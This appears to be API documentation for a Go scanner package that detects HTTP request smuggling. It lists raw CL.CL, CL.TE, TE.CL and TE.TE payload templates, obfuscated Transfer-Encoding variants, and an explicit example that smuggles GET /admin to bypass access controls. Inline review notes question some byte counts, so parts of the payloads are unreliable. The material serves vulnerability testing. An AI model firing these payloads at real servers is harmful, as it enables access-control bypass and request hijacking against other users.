Smuggling



Constants

This section is empty.

Variables

// ClClPayload holds the CL.CL probes (two conflicting Content-Length
// headers). Each template takes three %s arguments: the request path, the
// Host value, and a string appended to the Host line (extra headers or "").
//
//	[0] Content-Length: 6 then 5 with body "12345G". A hop honouring 5 leaves
//	    the "G" in its buffer, so the following "POST / HTTP/1.1" is parsed
//	    as "GPOST /" by whoever reads next. The template starts with an
//	    empty line before the request-line; RFC 7230 §3.5 lets servers
//	    tolerate one leading CRLF, but strict front-ends may answer 400 —
//	    TODO confirm the sender intends to keep it.
//	[1] Content-Length: 0 then 109. A hop honouring 0 treats the trailing
//	    GET /ws_utc/... (WebLogic) request as the next request on the
//	    connection. NOTE(review): 109 does not fall on a line boundary of
//	    the body with either LF or CRLF endings, so what the hop honouring
//	    109 leaves behind depends on its leftover-byte handling — confirm
//	    the intended split.
//
// The literals use LF line endings; the byte counts only make sense if the
// sender rewrites them to CRLF (compare ClTePayload[0], whose
// Content-Length: 6 equals len("0\r\n\r\nG")) — verify against the socket
// layer.
var ClClPayload = []string{`
POST %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
Content-Length: 6
Content-Length: 5

12345GPOST / HTTP/1.1
Host: localhost

`, `POST %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
Content-Length: 0
Content-Length: 109

GET /ws_utc/resources/setting/options/general?timestamp=1571211853278 HTTP/1.1
Host: localhost
Bla:   Bla:GET /ws_utc/resources/setting/options/general?timestamp=1571211853278 HTTP/1.1
Host: localhost
Connection: Keep-Alive

`}
// ClTePayload holds the CL.TE probes: one hop honours Content-Length, the
// other Transfer-Encoding. Each template takes three %s arguments: the
// request path, the Host value, and a string appended after the
// Content-Type line (extra headers or "").
//
//	[0] Content-Length: 6 with body "0\r\n\r\nG". The CL hop forwards all six
//	    bytes; the chunked hop stops at the empty chunk and leaves "G" to
//	    prefix the next request (the classic CL.TE detection probe).
//	[1] Content-length: 4, "Transfer-Encoding: chunked" and a second, invalid
//	    "Transfer-encoding: cow". The bogus duplicate is meant to make one
//	    hop ignore TE and read only "5c\r\n" (4 bytes) as the body, so the
//	    rest — a complete "GPOST / HTTP/1.1" with Content-Length: 15 and a
//	    3-byte body — is parsed as the next request and also swallows the
//	    first 12 bytes of whatever follows. The other hop decodes it as a
//	    single 0x5c-byte chunk.
//	[2] Content-Length: 62 covering a valid chunked body ("login=xxx&password=xxx"
//	    is 0x16 bytes) followed by "GET /404 HTTP/1.1\r\nX-Foo: bar". The CL
//	    hop forwards all 62 bytes; the chunked hop stops after the "0" chunk
//	    and the GET /404 fragment prefixes the next request, so a 404 on the
//	    follow-up indicates desync (see ClTe.CheckResponse).
//
// Byte counts assume CRLF line endings; the literals use LF, so the sender
// is expected to normalise them — TODO confirm.
var ClTePayload = []string{`POST %s HTTP/1.1
Host: %s
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded%s
Content-Length: 6
Transfer-Encoding: chunked

0

G`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Connection: Keep-Alive
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Connection: Keep-Alive
Content-Length: 62
Transfer-Encoding: chunked

16
login=xxx&password=xxx
0

GET /404 HTTP/1.1
X-Foo: bar`}

Exploit: bypass access control or a firewall rule by smuggling a request for /admin behind a permitted request (the PortSwigger CL.TE bypass shape):

POST /home HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Foo: x

Content-Length: 62 covers the whole body from the "0" chunk through "Foo: x" (with CRLF line endings), so a front-end honouring Content-Length forwards it intact, while a back-end honouring chunked encoding stops at the empty chunk and parses "GET /admin …" as the beginning of the next request on the same connection.

Payload 1: CL.TE.
Payload 2: CL.TE with an obfuscated Transfer-Encoding header (a second, invalid "Transfer-encoding: cow"), the TE.TE-style variant.
// ClTePayload2 holds the second CL.TE pair used by ClTe2: a detection probe
// and an access-control bypass. Same three %s arguments as ClTePayload
// (path, Host, string appended after Content-Type).
//
//	[0] Content-Length: 49. Chunked body "q=smuggling&x=" (0xe bytes), the
//	    "0" chunk, then "GET /404 HTTP/1.1\r\nFoo: x" which the chunked hop
//	    leaves in its buffer as the start of the next request.
//	[1] Content-Length: 116. Empty chunked body, then a complete
//	    "GET /admin HTTP/1.1" with "Host: localhost" and Content-Length: 10,
//	    so the smuggled request is served by the back-end and also swallows
//	    the first bytes of the request that follows ("x=" plus 8 more).
//
// Byte counts assume CRLF line endings; the literals use LF — confirm the
// sender normalises them.
var ClTePayload2 = []string{`POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=`}

Payload 1: CL.TE detection probe (smuggles a GET /404 prefix). Payload 2: CL.TE exploit smuggling GET /admin with Host: localhost, the access-control bypass variant.

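// ErrPayload holds deliberately malformed requests used by the Err checker;
// how a response is judged lives in Err.CheckResponse. Each template takes
// three %s arguments: the request path, the Host value, and a string
// appended to the Host line (extra headers or "").
//
//	[0] duplicate Content-Length (6 then 5) with body "12345G", identical to
//	    ClClPayload[0]. It begins with an empty line before the request-line
//	    (tolerated by RFC 7230 §3.5; strict front-ends may answer 400 — TODO
//	    confirm this is intended).
//	[1] a raw NUL byte inside the X-Something header value, followed — with
//	    no blank line — by a second request-line sitting in header position.
//	[2] the same NUL header, followed by an absolute-form
//	    GET http://localhost:7001/ws_utc/... (WebLogic) request-line.
//	[3] a 65535-byte X-Something value, followed by a second request-line in
//	    header position.
//
// A fifth entry byte-identical to [2] was removed: it re-sent the same probe
// and only doubled the request count against the target.
var ErrPayload = []string{`
POST %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
Content-Length: 6
Content-Length: 5

12345GPOST / HTTP/1.1
Host: localhost

`, `GET %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
X-Something: ` + "\x00" + ` something
X-Foo: Bar
GET /index.html?bar=1 HTTP/1.1
Host: localhost
`, `GET %s HTTP/1.1
Host: %s%s
Connection: Keep-Alive
X-Something: ` + "\x00" + ` something
GET http://localhost:7001/ws_utc/resources/setting/options/general?timestamp=1571211853278 HTTP/1.1`, `GET %s HTTP/1.1
Host: %s%s
X-Something: ` + strings.Repeat("A", 65535) + `
X-Foo: Bar
GET /index.html?bar=1 HTTP/1.1
Host: localhost
`}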

\u0000 — probes [1] and [2] embed a raw NUL byte inside an X-Something header value, and probe [3] sends a 65535-byte header value. These requests are malformed on purpose; Err.CheckResponse decides what counts as a hit.

// TeClPayload holds the TE.CL probe: one hop honours Transfer-Encoding, the
// other Content-Length. Three %s arguments: the request path, the Host
// value, and a string appended after the Content-Type line.
//
//	[0] Content-length: 4 plus Transfer-Encoding: chunked. The hop honouring
//	    Content-Length reads only "5c\r\n" as the body and parses the rest as
//	    a new request: "GPOST / HTTP/1.1" with Content-Length: 15 but only a
//	    3-byte body ("x=1"), so it also consumes the first 12 bytes of the
//	    request that follows. The hop honouring chunked encoding decodes the
//	    same bytes as one 0x5c-byte chunk plus the terminating "0" chunk.
//	    The chunk body is the same as ClTePayload[1] without the bogus second
//	    Transfer-Encoding header.
//
// Byte counts assume CRLF line endings; the literal uses LF — confirm the
// sender normalises them.
var TeClPayload = []string{`POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Connection: Keep-Alive
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`}
// TeTePayload holds the TE.TE probes: both hops support Transfer-Encoding,
// and each variant obfuscates the header so that one hop stops honouring it
// and falls back to Content-Length (or to an empty body when none is sent).
// Three %s arguments: the request path, the Host value, and a string
// appended after the Content-Type line.
//
// Every variant carries the same chunked body: one 0x5c-byte chunk holding
// a complete "GPOST / HTTP/1.1" request (Content-Length: 15 with a 3-byte
// body, so it also swallows the first 12 bytes of the following request),
// then the terminating "0" chunk. A hop that drops TE and honours
// "Content-length: 4" reads only "5c\r\n" and parses "GPOST /" as a new
// request. Byte counts assume CRLF line endings (the literals use LF).
//
//	[0]  two TE headers: "chunked" then an invalid "x"
//	[1]  value prefixed with a raw NUL byte: "\x00chunked"
//	[2]  no space after the colon, plus a second "Transfer-encoding:x"
//	[3]  "xchunked" plus "Transfer-encoding : chunked" (space before colon)
//	[4]  "xchunked" plus a plain duplicate "Transfer-encoding: chunked"
//	[5]  tab between ": " and "chunked", with Content-length
//	[6]  same tab variant, without any Content-Length
//	[7]  header line begins with a space (obs-fold shape), with Content-length
//	[8]  same leading-space variant, without any Content-Length
//	[9]  space before the colon only, with Content-length
//	[10] header name and ": chunked" split across two lines, sent twice
var TeTePayload = []string{`POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: x

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding: ` + "\x00" + `chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding:chunked
Transfer-encoding:x

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding: xchunked
Transfer-encoding : chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-Encoding: xchunked
Transfer-encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-encoding: 	chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Transfer-encoding: 	chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
 Transfer-encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
 Transfer-encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-encoding : chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`, `POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded%s
Content-length: 4
Transfer-encoding
: chunked
Transfer-encoding
: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

`}

Connection: Keep-Alive — none of the TE.TE variants sets it explicitly; HTTP/1.1 connections are persistent by default, and the probe relies on the bytes left in a hop's buffer being read as the start of the next request on the same connection.

Functions

func DoCheckSmuggling

func DoCheckSmuggling(szUrl string, szBody string)
 Check for HTTP request smuggling.
   Smuggling can be used to reach paths that conventional controls block, e.g. WebLogic pages.
  https://portswigger.net/web-security/request-smuggling/finding
  https://hackerone.com/reports/1630668
  https://github.com/nodejs/llhttp/blob/master/src/llhttp/http.ts#L483
  1. Each target's login page is checked only once: when a login-page path is discovered, run a single check against it.
  2. Pages that share the same context on a target are checked once; each distinct context discovered by the crawler gets its own check.
  szBody exists so that, for the same URL and payload, one response can be evaluated several times instead of re-sending the request; that situation does not normally arise for smuggling.

 Queues one HTTP smuggling check:
	util.PocCheck_pipe <- &util.PocCheck{
		Wappalyzertechnologies: &[]string{"httpCheckSmuggling"},
		URL:                    finalURL,
		FinalURL:               finalURL,
		Checklog4j:             false,
	}

func E2EC

func E2EC(s string) string

func GenerateHttpSmugglingPay

func GenerateHttpSmugglingPay(szUrl, smugglinUrlPath, secHost string) string

Builds a smuggling request used to reach a page that is otherwise blocked.

Once a smuggling vulnerability has been confirmed, file fuzzing can continue on top of it.
1. szUrl must be reachable and return 200 first; otherwise results may be misjudged (false positives).
@szUrl the target against which smuggling is attempted
@smugglinUrlPath the page the smuggled request should reach, e.g. /console
@secHost the Host header value for the second (smuggled) request

Types

type Base

// Base is the shared implementation embedded by every checker in this
// package (ClCl, ClTe, ClTe2, Err, TeCl, TeTe). It carries the raw request
// templates and a label for the desync class; its methods supply the
// default Smuggling behaviour that concrete checkers override as needed.
type Base struct {
	// Payload holds request templates with %s placeholders, as in the
	// package-level *Payload variables.
	Payload []string
	// Type labels the desync class this checker tests; presumably what
	// GetVulType returns — confirm against the method body.
	Type    string
}

func (*Base) CheckResponse

func (r *Base) CheckResponse(body string, payload string) bool

func (*Base) GetPayloads

func (r *Base) GetPayloads(t *socket.CheckTarget) *[]string

func (*Base) GetTimes

func (r *Base) GetTimes() int

func (*Base) GetVulType

func (r *Base) GetVulType() string

func (*Base) New

func (r *Base) New() int

type ClCl

// ClCl probes for CL.CL desync (two conflicting Content-Length headers);
// NewClCl presumably seeds Base.Payload with ClClPayload — confirm.
type ClCl struct {
	Base
}

func NewClCl

func NewClCl() *ClCl

type ClTe

// ClTe probes for CL.TE desync (front-end honours Content-Length, back-end
// honours Transfer-Encoding); NewCLTE presumably seeds Base.Payload with
// ClTePayload. It overrides CheckResponse and GetTimes.
type ClTe struct {
	Base
}

func NewCLTE

func NewCLTE() *ClTe

func (*ClTe) CheckResponse

func (r *ClTe) CheckResponse(body string, payload string) bool

The third payload is confirmed when the follow-up response is a 404: the smuggled `GET /404 HTTP/1.1` prefix left behind by the chunked hop was consumed as the start of the next request.

func (*ClTe) GetTimes

func (r *ClTe) GetTimes() int

type ClTe2

// ClTe2 is a second CL.TE checker (detection probe plus /admin bypass);
// NewCLTE2 presumably seeds Base.Payload with ClTePayload2. It overrides
// CheckResponse and GetTimes.
type ClTe2 struct {
	Base
}

func NewCLTE2

func NewCLTE2() *ClTe2

func (*ClTe2) CheckResponse

func (r *ClTe2) CheckResponse(body string, payload string) bool

The second payload is confirmed when the response comes back successfully, i.e. the smuggled `GET /admin` request (Host: localhost) was served.

func (*ClTe2) GetTimes

func (r *ClTe2) GetTimes() int

Preconditions: the first segment of the first request must itself return 200. The first request leaves its second segment queued on the back-end; the second request is appended after that leftover segment, so whatever the second request contains yields a 404 — which indicates the vulnerability.

type Err

// Err sends deliberately malformed requests (NUL bytes in header values,
// oversized headers, duplicate Content-Length); NewErr presumably seeds
// Base.Payload with ErrPayload. It overrides CheckResponse.
type Err struct {
	Base
}

func NewErr

func NewErr() *Err

func (*Err) CheckResponse

func (r *Err) CheckResponse(body string, payload string) bool

type Smuggling

// Smuggling is the contract every desync checker in this package implements;
// Base provides a default for each method.
type Smuggling interface {
	// CheckResponse reports whether the raw response received for the given
	// payload indicates a desync (e.g. ClTe treats a 404 on its third
	// payload as a hit).
	CheckResponse(body string, payload string) bool
	// GetPayloads renders the checker's templates for the given target.
	GetPayloads(t *socket.CheckTarget) *[]string
	// GetTimes returns how many times a payload is sent; see ClTe2.GetTimes,
	// where the first request primes the back-end and the second observes.
	GetTimes() int
	// GetVulType returns the label of the desync class being tested.
	GetVulType() string
}

Interface implemented by every checker in this package (ClCl, ClTe, ClTe2, Err, TeCl and TeTe all embed Base, which supplies these four methods).

type TeCl

// TeCl probes for TE.CL desync (front-end honours Transfer-Encoding, back-end
// honours Content-Length); NewTECL presumably seeds Base.Payload with
// TeClPayload. It overrides CheckResponse and GetPayloads.
type TeCl struct {
	Base
}

func NewTECL

func NewTECL() *TeCl

func (*TeCl) CheckResponse

func (r *TeCl) CheckResponse(body string, payload string) bool

func (*TeCl) GetPayloads

func (r *TeCl) GetPayloads(t *socket.CheckTarget) *[]string

type TeTe

// TeTe probes for TE.TE desync using the obfuscated Transfer-Encoding
// variants in TeTePayload; NewTETE presumably seeds Base.Payload with them.
type TeTe struct {
	Base
}

func NewTETE

func NewTETE() *TeTe
